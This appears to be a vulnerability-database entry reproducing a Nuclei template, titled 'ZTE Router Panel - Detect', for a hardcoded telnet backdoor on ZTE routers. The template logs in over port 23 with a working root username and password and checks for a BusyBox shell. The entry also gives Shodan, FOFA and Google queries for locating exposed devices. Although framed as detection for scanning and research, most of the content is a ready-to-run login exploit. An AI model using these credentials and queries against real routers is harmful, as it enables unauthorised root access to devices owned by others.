backdoored-zte: ZTE Router Panel - Detect

日期: 2025-08-01 | 影响软件: ZTE Router Panel | POC: 已公开

漏洞描述

Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell. shodan: http.html:"ZTE Corporation" fofa: title="F660" google: intitle:"F660" intext:"ZTE Corporation"

PoC代码[已公开]

id: backdoored-zte

info:
  name: ZTE Router Panel - Detect
  author: its0x08
  severity: critical
  description: |
    Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell.
  reference:
    - https://www.exploit-db.com/ghdb/7179
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-912
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"ZTE Corporation"
  tags: edb,network,zte,telnet,backdoor,router,tcp,vuln
tcp:
  - host:
      - "{{Hostname}}"
    port: 23
    inputs:
      - data: "root\r\n"
      - data: "Zte521\r\n\r\n"
        read: 1024

    matchers:
      - type: word
        words:
          - "BusyBox"

    extractors:
      - type: regex
        regex:
          - '[A-Z]{1,}[0-9]{3,4}'
# digest: 4a0a00473045022072842be76221acbdee33856cbd895c0f5cfcd428294f9fb40a0e1f1f1a79376a022100bb0974141a12135662b0d0e42527ad3cd4aa12db1bc799e7dde199e018817640:922c64590222798bb761d5b6d8e72950